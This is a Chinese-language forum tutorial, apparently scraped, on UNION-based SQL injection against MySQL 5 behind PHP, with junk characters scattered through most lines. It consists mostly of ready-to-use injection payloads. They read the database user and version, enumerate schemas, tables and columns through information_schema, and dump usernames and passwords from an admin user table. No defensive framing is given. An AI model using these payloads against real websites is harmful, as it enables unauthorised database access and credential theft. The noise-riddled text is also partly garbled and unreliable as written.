3 v6 @7 a# J6 C- ^% J+ q教程内容:Mysql 5+php 注入4 p: S: @: D7 l
( g/ m u3 n, I2 m1 o8 K& D& c4 u; H# o c! p
6 N: e# l1 l8 ^ n! C. N# ~
一.查看MYSQL基本信息(库名,版本,用户)( z! Z, _3 z6 i& b* ?
( t8 g% G e; n
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
' x$ n/ T2 G5 Y8 S2 X% w9 Y$ T
. w* n7 P8 o" v; e+ V' ]; t二.查数据库6 H! H3 O2 p& g2 ]6 a) K
" S' P$ K& Q! G, x8 v3 H( j
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
* F0 {* T0 i3 p$ W5 Wlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
7 U5 Q# t' V9 |7 }. @. M6 \1 d7 _- o @9 O3 H( \9 M
三.暴表
" ?& J9 f6 P; ~
; ~2 ~: }3 ` z/ k# @6 v1 aand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
& K O. g, L' D4 Y
$ }" l ^+ z0 f h9 `limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。 O& r! P! a* }" T4 A; m4 F/ N
: ?- T1 b# p& l- m/ i
四.暴字段
' G; W1 S2 g! ]# p
8 K( Z9 ^2 z" i% Y/ {and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
2 L- j, W) V1 {, _/ Y. M4 B1 _. q. r: b& r
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。; M D5 ?7 z) G2 d5 W
2 o, i5 c6 B) @: y& C' k' A/ b
五.暴数据: a& _0 q Z; Z: e1 e: p8 ~8 A9 l
4 P* c% i" k6 m/ D# a1 H$ V
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
% z7 r- _7 @1 e
. e0 L- r! H& N" x6 Q& q) n0 D; k, W$ C' |8 A9 K" H
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
: S5 a% y A* A/ W6 o/ R* T" ? |